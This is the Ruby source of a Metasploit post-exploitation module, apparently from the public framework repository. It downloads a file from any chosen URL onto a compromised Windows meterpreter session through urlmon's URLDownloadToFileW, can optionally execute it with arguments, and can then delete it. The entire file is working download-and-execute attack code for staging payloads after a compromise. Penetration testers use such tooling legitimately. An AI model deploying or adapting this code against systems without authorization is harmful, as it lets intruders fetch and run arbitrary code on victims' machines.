Path: blob/master/modules/post/windows/manage/download_exec.rb
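##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module: fetch a file onto the target with urlmon's URLDownloadToFileW
# (registered through railgun), then optionally run it and optionally delete it.
class MetasploitModule < Msf::Post
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Download and/or Execute',
        'Description' => %q{
          This module will download a file by importing urlmon via railgun.
          The user may also choose to execute the file with arguments via exec_string.
        },
        'License' => MSF_LICENSE,
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Author' => ['RageLtMan <rageltman[at]sempervictus>'],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_fs_file_expand_path
              stdapi_fs_stat
              stdapi_railgun_api
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('URL', [true, 'Full URL of file to download' ]),
        OptString.new('DOWNLOAD_PATH', [false, 'Full path for downloaded file' ]),
        OptString.new('FILENAME', [false, 'Name for downloaded file' ]),
        OptBool.new('OUTPUT', [true, 'Show execution output', true ]),
        OptBool.new('EXECUTE', [true, 'Execute file after completion', false ]),
      ]
    )

    register_advanced_options(
      [
        OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
        OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
        OptBool.new('DELETE', [true, 'Delete file after execution', false ]),
      ]
    )
  end

  # Register urlmon and the URLDownloadToFileW prototype with railgun unless the
  # session already has a library named 'urlmon'. Idempotent across repeated runs
  # on the same session.
  #
  # @return [void]
  def add_railgun_urlmon
    if session.railgun.libraries.none? { |lib| lib.first == 'urlmon' }
      session.railgun.add_dll('urlmon', 'urlmon')
      session.railgun.add_function(
        'urlmon', 'URLDownloadToFileW', 'DWORD',
        [
          ['PBLOB', 'pCaller', 'in'],
          ['PWCHAR', 'szURL', 'in'],
          ['PWCHAR', 'szFileName', 'in'],
          ['DWORD', 'dwReserved', 'in'],
          ['PBLOB', 'lpfnCB', 'inout']
        ]
      )
      vprint_good('urlmon loaded and configured')
    else
      vprint_status('urlmon already loaded')
    end
  end

  # Module entry point.
  #
  # Resolves the destination path (DOWNLOAD_PATH, or the session's TEMP when
  # unset), downloads URL there, and confirms the write with a stat. When
  # EXECUTE is set the file is run through cmd_exec with EXEC_STRING appended;
  # when DELETE is set the file is removed afterwards. Errors in the optional
  # execute/delete steps are reported, not raised.
  #
  # @return [Integer, nil] 0 when the session is not meterpreter (nothing is
  #   attempted); nil otherwise.
  def run
    # Make sure we meet the requirements before running the script, note no need to return
    # unless error
    return 0 if session.type != 'meterpreter'

    # Wall-clock start, only used for the elapsed-time report below.
    strtime = Time.now

    # check/set vars
    url = datastore['URL']
    # Default the local name to the last URL path segment when FILENAME is unset.
    filename = datastore['FILENAME'] || url.split('/').last

    path = datastore['DOWNLOAD_PATH']
    if path.blank?
      path = session.sys.config.getenv('TEMP')
    else
      path = session.fs.file.expand_path(path)
    end

    outpath = path + '\\' + filename
    exec = datastore['EXECUTE']
    exec_string = datastore['EXEC_STRING']
    output = datastore['OUTPUT']
    remove = datastore['DELETE']

    # set up railgun
    add_railgun_urlmon

    # get our file
    vprint_status("Downloading #{url} to #{outpath}")
    session.railgun.urlmon.URLDownloadToFileW(nil, url, outpath, 0, nil)

    # The API's return value is not inspected; success is inferred from the
    # file existing afterwards, so a failed stat is treated as a failed download.
    begin
      out = session.fs.file.stat(outpath)
      print_status("#{out.stathash['st_size']} bytes downloaded to #{outpath} in #{(Time.now - strtime).to_i} seconds ")
    rescue StandardError
      print_error('File not found. The download probably failed')
      return
    end

    # Execute file upon request
    if exec
      begin
        cmd = "\"#{outpath}\" #{exec_string}"

        print_status("Executing file: #{cmd}")
        res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])
        print_good(res) if output && !res.empty?
      rescue StandardError => e
        # StandardError rather than ::Exception: rescuing Exception would also
        # swallow Interrupt/SystemExit and make the module impossible to abort.
        print_error("Unable to execute: #{e.message}")
      end
    end

    # remove file if needed
    if remove
      begin
        print_status("Deleting #{outpath}")
        session.fs.file.rm(outpath)
      rescue StandardError => e
        print_error("Unable to remove file: #{e.message}")
      end
    end
  end
end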